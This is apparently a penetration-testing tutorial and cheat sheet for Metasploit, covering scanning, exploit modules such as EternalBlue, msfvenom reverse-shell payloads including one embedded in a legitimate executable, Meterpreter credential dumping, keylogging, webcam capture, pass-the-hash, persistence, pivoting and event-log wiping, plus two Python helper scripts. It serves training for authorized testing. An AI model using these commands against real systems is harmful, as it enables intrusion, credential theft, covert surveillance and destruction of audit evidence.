Mastering Metasploit:

If you’re serious about penetration testing, you need to know Metasploit. It’s one of the most powerful tools in the offensive security toolkit. Whether you’re scanning, exploiting, escalating privileges, or post-exploitation looting, Metasploit offers a modular, flexible, and heavily supported framework to do it all. This post is a complete breakdown of how to use Metasploit effectively in real-world pentests.

Metasploit is an open-source penetration testing framework maintained by Rapid7. It provides exploits, payloads, scanners, and post-exploitation modules that make exploitation and shell access fast and repeatable, plus a database that keeps what you learn about each host. In short, it's a Swiss Army knife for pentesters. Be clear about what it is not: the exploit modules target publicly disclosed, usually long-patched vulnerabilities, so the framework ships no zero-days. Its value is reliable, scriptable exploitation and post-exploitation, not secret bugs.

If you're on a system without it (the package below is the one Kali ships; on other distributions use the Rapid7 installer script or a git checkout of the framework):

sudo apt update && sudo apt install metasploit-framework
msfconsole

msfconsole is the interactive command-line interface (CLI) where most of the work happens.

msfupdate

Do this regularly; new exploits and modules land every week. On a packaged install msfupdate hands off to the package manager (on Kali it amounts to upgrading the metasploit-framework package with apt); on a git checkout it pulls the latest commit.

The framework is organized into module types:

  • Exploits – Code that triggers a specific vulnerability in order to deliver a payload.
  • Payloads – The code that runs after exploitation (reverse shells, Meterpreter, etc.).
  • Auxiliary Modules – Scanners, fuzzers, brute-forcers, sniffers and fake servers: everything that does not deliver a payload.
  • Encoders – Re-encode a payload to avoid bytes the target can't carry (null bytes, newlines, non-printable characters). They are not an AV-evasion tool; x86/shikata_ga_nai output is signatured by every mainstream AV product.
  • Post Modules – Run through an existing session for privilege escalation, credential and data gathering, persistence and pivoting.
  • Nops – No-op padding that makes a shellcode landing zone tolerant of an imprecise jump.
  • Evasion Modules – Generate payload executables aimed at specific AV products (added in Metasploit 5).
Essential console commands:

search <term>         # Find modules (search also takes filters such as type:, platform:, cve:)
use <module_path>     # Load a module
info                  # Show module info, options, targets and references
show options          # Show required/optional options
set <option> <value>  # Set option value
run / exploit         # Execute the module (run works for every module type)
sessions              # List active sessions
sessions -u 1         # Upgrade plain shell session 1 to Meterpreter
setg LHOST 10.10.14.25
setg LPORT 4444

Global options persist across modules.

A TCP port scan from inside the console:

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.10.0/24
set THREADS 20
run

This is a full-connect scanner, slow and noisy over a /24; it earns its keep when you're pivoting through a session and Nmap can't reach the network. For version fingerprinting by service:

  • HTTP: use auxiliary/scanner/http/http_version
  • SMB: use auxiliary/scanner/smb/smb_version
  • SSH: use auxiliary/scanner/ssh/ssh_version
db_nmap -sV -Pn 10.10.10.5

db_nmap runs Nmap with the given arguments and imports the results into Metasploit's database as hosts, services and versions, which later modules can read. It needs the database up: on Kali run sudo msfdb init once, then confirm with db_status in the console, and use workspace -a <name> to keep each engagement's data separate. Existing Nmap XML output can be loaded with db_import.

A classic: EternalBlue (MS17-010) against an unpatched Windows host.

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST 10.10.14.25
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

Run check before exploit: this module corrupts kernel memory and can blue-screen a host that is mis-fingerprinted or already patched. Other well-known modules:

  • FTP backdoor (vsftpd 2.3.4): use exploit/unix/ftp/vsftpd_234_backdoor
  • Tomcat Manager WAR upload: use exploit/multi/http/tomcat_mgr_upload (an authenticated deploy, not an auth bypass; it needs manager credentials, for example defaults found with auxiliary/scanner/http/tomcat_mgr_login)
Payload types:

  • Reverse Shell – The target connects back to the attacker's listener; because the connection is outbound it works through NAT and inbound firewall filtering.
  • Bind Shell – The payload opens a listening port on the target and the attacker connects to it; needs a port reachable from the attacker.

Payload names encode how they are built, and the handler must be set to exactly the same string:

  • windows/meterpreter/reverse_tcp – staged (stage and stager separated by a slash): a small stager connects back and downloads the Meterpreter stage from the handler.
  • linux/x86/meterpreter_reverse_tcp – stageless (underscore): the whole payload ships in one binary, larger but with no second download to be blocked or inspected.
  • cmd/unix/reverse – a single command-shell payload with no Meterpreter; small, and usable wherever a shell command can run.
Once a Meterpreter session is open, the basics:

sysinfo
shell
upload <file>
download <file>
keyscan_start
screenshot
Building standalone payloads with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o shell.exe
msfvenom -x legit.exe -p windows/meterpreter/reverse_tcp LHOST=... -f exe -o evil.exe

The second command is the first with five passes of the shikata_ga_nai encoder; that fixes bad-character problems and does nothing useful against AV. The third embeds the payload in an existing executable used as a template (add -k to keep the template's original behaviour running in a new thread; this only works for some binaries). Catch the connection with exploit/multi/handler set to the identical payload string, LHOST and LPORT.
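Two things go wrong with these commands in practice: a payload name that doesn't mean what you think (staged versus stageless), and a handler set to a different payload than msfvenom used, which just hangs. As an added example (not code from the original post or from Metasploit), a small Python parser for payload names that explains such a mismatch; the stage names and architecture tokens in it are assumptions, not a list read from the framework:

```python
"""Decode Metasploit payload names and explain why a handler won't catch a payload.

Added example, not from the original post or from Metasploit. It encodes the
naming convention: "stage/stager" (meterpreter/reverse_tcp) is staged,
"stage_stager" (meterpreter_reverse_tcp) is stageless, anything else is a
single payload. STAGES and ARCHES are assumed common values, not framework data.
"""
from dataclasses import dataclass

STAGES = ("meterpreter", "shell", "vncinject", "dllinject", "upexec")
ARCHES = ("x64", "x86", "aarch64", "armle", "armbe", "mipsle", "mipsbe", "ppc")
STAGER_PREFIXES = ("reverse_", "bind_")


@dataclass(frozen=True)
class Payload:
    name: str
    platform: str   # windows, linux, cmd, python, ...
    arch: str       # "" when the name carries none (32-bit Windows, cmd/unix)
    kind: str       # "staged", "stageless" or "single"
    stage: str      # "" for single payloads
    stager: str     # transport, e.g. "reverse_tcp"; the last element for singles


def parse_payload(name: str) -> Payload:
    parts = [p for p in name.strip().split("/") if p]
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest[0] in ARCHES else ""
    if not rest:
        raise ValueError(f"payload path has no payload component: {name!r}")
    last = rest[-1]
    # staged: .../<stage>/<stager>
    if len(rest) >= 2 and rest[-2] in STAGES and last.startswith(STAGER_PREFIXES):
        return Payload(name, platform, arch, "staged", rest[-2], last)
    # stageless: .../<stage>_<stager>
    for stage in STAGES:
        head = stage + "_"
        if last.startswith(head) and last[len(head):].startswith(STAGER_PREFIXES):
            return Payload(name, platform, arch, "stageless", stage, last[len(head):])
    return Payload(name, platform, arch, "single", "", last)


def handler_mismatch(venom_payload: str, handler_payload: str) -> str:
    """Return "" when exploit/multi/handler set to handler_payload will catch a
    binary built with -p venom_payload, otherwise a one-line reason.
    The real rule is exact string equality; parsing only makes the reason readable."""
    if venom_payload.strip() == handler_payload.strip():
        return ""
    a, b = parse_payload(venom_payload), parse_payload(handler_payload)
    if (a.platform, a.arch) != (b.platform, b.arch):
        return (f"platform/arch differ: {a.platform}/{a.arch or 'default'} "
                f"vs {b.platform}/{b.arch or 'default'}")
    if a.kind != b.kind:
        what = "never send" if a.kind == "staged" else "try to send"
        return f"{a.kind} payload but {b.kind} handler: the handler would {what} a stage"
    if a.stage != b.stage:
        return f"stage differs: {a.stage} vs {b.stage}"
    if a.stager != b.stager:
        return f"transport differs: {a.stager} vs {b.stager}"
    return "payload names differ"


if __name__ == "__main__":
    for n in ("windows/x64/meterpreter/reverse_tcp", "linux/x86/meterpreter_reverse_tcp", "cmd/unix/reverse"):
        print(parse_payload(n))
    print(handler_mismatch("windows/x64/meterpreter_reverse_tcp", "windows/x64/meterpreter/reverse_tcp"))
```

The check is deliberately stricter than the parser: it only returns an empty string for identical names, because that is what multi/handler requires; the parsed fields exist to tell you which part of the name you got wrong.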
Post-exploitation from a Meterpreter session:

  • getuid, getsystem – who you are, then try the built-in local privilege escalation techniques; on a patched host expect getsystem to fail and fall back to post/multi/recon/local_exploit_suggester.
  • hashdump – dump local SAM hashes (needs SYSTEM).
  • load kiwi – Mimikatz-style credential dumping (creds_all); needs SYSTEM and a session whose architecture matches the OS, so migrate to a 64-bit process first on x64 Windows.
  • migrate <PID> – move into a stable, long-lived process (explorer.exe, for example) before keylogging or any long operation.
  • background – return to the console and keep the session for later; sessions -i <id> brings it back.

Pivoting into a network only the victim can reach:

run autoroute -s 192.168.100.0/24

This pushes a route for that subnet through the current session so other modules (scanners, psexec) can reach it. From the console the equivalent is route add 192.168.100.0/24 <session id>; pair it with auxiliary/server/socks_proxy and proxychains to run tools outside Metasploit over the same pivot.
Web application modules:

  • WordPress: use exploit/unix/webapp/wp_admin_shell_upload (needs admin credentials; it uploads a plugin through the admin panel)
  • Shellshock: use exploit/multi/http/apache_mod_cgi_bash_env_exec (CVE-2014-6271 through a CGI script; set TARGETURI to the script path)

Brute-forcing HTTP basic/digest authentication: use auxiliary/scanner/http/http_login (set USER_FILE and PASS_FILE, or USERPASS_FILE, and check the lockout policy first).
Capture credentials by standing up fake services and luring clients to them (a UNC path in a document or email, or a poisoned name-resolution reply, for the SMB one):

  • auxiliary/server/capture/smb – collects NetNTLM challenge-responses for offline cracking
  • auxiliary/server/capture/http – basic-auth credentials
  • auxiliary/server/capture/ftp – cleartext FTP logins
Reusing a dumped hash with psexec (pass-the-hash):

use exploit/windows/smb/psexec
set SMBUser admin
set SMBPass <NTLM HASH>

SMBPass takes either a cleartext password or the LM:NT pair exactly as hashdump prints it (two 32-hex-character halves separated by a colon, e.g. aad3b435b51404eeaad3b435b51404ee:<NT hash>); a bare NT hash is treated as a password and the login fails. Set SMBDomain for domain accounts, and RHOSTS/LHOST as usual. psexec needs local admin on the target because it writes a service binary to ADMIN$, which makes it noisy: the service installation shows up in the System log as event 7045.
Useful post modules, persistence and cleanup:

  • post/windows/gather/enum_logged_on_users
  • post/multi/gather/browser_history
  • Persistence: post/windows/manage/persistence_exe (drops an executable and a Run key) or exploit/windows/local/persistence; both leave artefacts that must be recorded and removed at the end of the engagement.

clearev

clearev wipes the Application, System and Security event logs. It is not stealthy: Windows logs the wipe itself (event 1102 in the Security log, 104 in the System log), which is a high-fidelity alert in most SOCs. Check your rules of engagement before touching logs at all.
A typical engagement, end to end:

  1. Scan with Nmap
  2. Import the results (db_nmap scans and imports in one step; db_import loads existing Nmap XML)
  3. Enumerate services: SMB, HTTP, SSH
  4. Exploit: EternalBlue, web upload, etc.
  5. Gain a Meterpreter shell
  6. Escalate: getsystem, kiwi
  7. Loot creds, files, hashes
  8. Persist or pivot
  9. Clean up
Automating and keeping track:

msfconsole -r myscript.rc     # Replay a resource script: console commands, one per line, run in order
background                    # Put the current session in the background
sessions -i 1                 # Interact with session 1
spool output.txt              # Log everything the console prints to a file (evidence for the report)
hosts                         # Hosts in the database
services                      # Services and ports discovered
vulns                         # Vulnerabilities recorded by modules and imports
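A resource script is the natural way to make the first steps of the workflow above repeatable. The following Python generator is an added example (not from the original post or from Metasploit): it writes the console commands for scanning, importing, service enumeration, logging and a background handler, and it refuses the two inputs that most often waste an afternoon, an LHOST inside the target range and an invalid port. The module names are the ones used on this page; the addresses are constructed sample values.

```python
"""Generate a Metasploit resource script (.rc) for recon plus a handler.

Added example, not from the original post or from Metasploit. An .rc file is
console commands, one per line, executed in order by `msfconsole -r file.rc`.
Target and attacker addresses in the usage at the bottom are constructed.
"""
import ipaddress
from typing import List


def lhost_in_targets(targets: List[str], lhost: str) -> bool:
    """True when LHOST falls inside a target range: a common slip that makes
    the payload call back to the wrong machine."""
    attacker = ipaddress.ip_address(lhost)
    return any(attacker in ipaddress.ip_network(t, strict=False) for t in targets)


def build_rc(workspace: str, targets: List[str], lhost: str, lport: int,
             payload: str = "windows/x64/meterpreter/reverse_tcp",
             log_file: str = "engagement.log") -> List[str]:
    """Return the resource-script lines; raises ValueError on bad input."""
    if not workspace.replace("-", "").replace("_", "").isalnum():
        raise ValueError("workspace name should be alphanumeric")
    if not 1 <= lport <= 65535:
        raise ValueError(f"LPORT {lport} out of range")
    if lhost_in_targets(targets, lhost):
        raise ValueError(f"LHOST {lhost} lies inside a target range; use your VPN/lab interface address")
    nets = [ipaddress.ip_network(t, strict=False) for t in targets]
    # single hosts are written bare, ranges in CIDR; RHOSTS accepts a space-separated list
    rhosts = " ".join(str(n.network_address) if n.num_addresses == 1 else str(n) for n in nets)
    lines = [
        f"spool {log_file}",            # keep a full transcript for the report
        f"workspace -a {workspace}",    # isolate this engagement's hosts/services/creds
        f"setg LHOST {lhost}",
        f"setg LPORT {lport}",
        f"db_nmap -sV -Pn {rhosts}",    # steps 1-2: scan and import in one go
    ]
    for scanner in ("smb/smb_version", "http/http_version", "ssh/ssh_version"):  # step 3
        lines += [f"use auxiliary/scanner/{scanner}", f"set RHOSTS {rhosts}", "set THREADS 20", "run"]
    lines += [
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        "exploit -j -z",                # background job; incoming shells show up under `sessions`
    ]
    return lines


def render_rc(lines: List[str]) -> str:
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    script = render_rc(build_rc("lab", ["10.10.10.0/24", "10.10.11.7"], "10.10.14.25", 4444))
    with open("engagement.rc", "w") as fh:
        fh.write(script)
    print(script)
```

Run the output with msfconsole -r engagement.rc; because the handler is started as a job, the console stays usable for the exploitation steps while sessions accumulate.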
  • Don’t rely on it blindly—manual exploitation is a must-learn skill.
  • Understand your targets—Metasploit can crash systems.
  • Only use it in environments you’re authorized to test.
Meterpreter command reference:

  • sysinfo – Displays system information (OS, architecture, etc.)
  • getuid – Shows the user Meterpreter is running as
  • getpid – Displays the current process ID
  • ps – Lists running processes
  • migrate <PID> – Migrates Meterpreter into another process (for stability, or to match the OS architecture before kiwi)
  • shell – Opens a standard command shell on the victim
  • run post/windows/gather/hashdump – Dumps local SAM hashes through the post module (needs SYSTEM)
  • hashdump – Dumps local password hashes with the built-in priv extension (needs SYSTEM)
  • load kiwi – Loads Kiwi (the Mimikatz extension) for advanced credential access
  • creds_all (after load kiwi) – Dumps all credentials Kiwi can find (needs SYSTEM)
  • execute -f <program> – Executes a program on the target (-i to interact with it, -H to hide its window)
  • upload <local> <remote> – Uploads a file from your system to the victim
  • download <remote> – Downloads a file from the victim to your system
  • edit <file> – Opens a remote file in a local editor
  • cat <file> – Reads and prints the contents of a file
  • cd <dir> / ls – Change directory / list files
  • search -f <file> – Searches for files by name or glob
  • idletime – Shows how long the logged-on user has been idle (check before screenshots or keylogging)
  • keyscan_start / keyscan_dump / keyscan_stop – Start, collect and stop keylogging (migrate into the user's explorer.exe first, or you capture nothing)
  • screenshot – Takes a screenshot of the target's desktop
  • record_mic – Records from the microphone (Windows target)
  • webcam_snap – Captures a webcam snapshot (webcam_list shows what's available)
  • clearev – Clears the Windows event logs (be careful: the wipe itself is logged and is a loud indicator)
  • portfwd add -l <LPORT> -p <TPORT> -r <RHOST> – Forwards local port LPORT on your machine through the session to port TPORT on RHOST, a host the victim can reach
  • run autoroute -s <subnet> – Routes traffic for that subnet through the victim so other modules reach the new network segment

Metasploit isn’t magic—it’s a powerful tool for automation and efficiency, but the real skill is in knowing how and when to use it. This post is your cheat sheet, guide, and field manual. The more you use it in real labs, the more it becomes second nature.

If you’re still getting comfortable, keep exploring, practicing, and pairing Metasploit with manual techniques. The best pentesters know that tools change, but principles don’t.
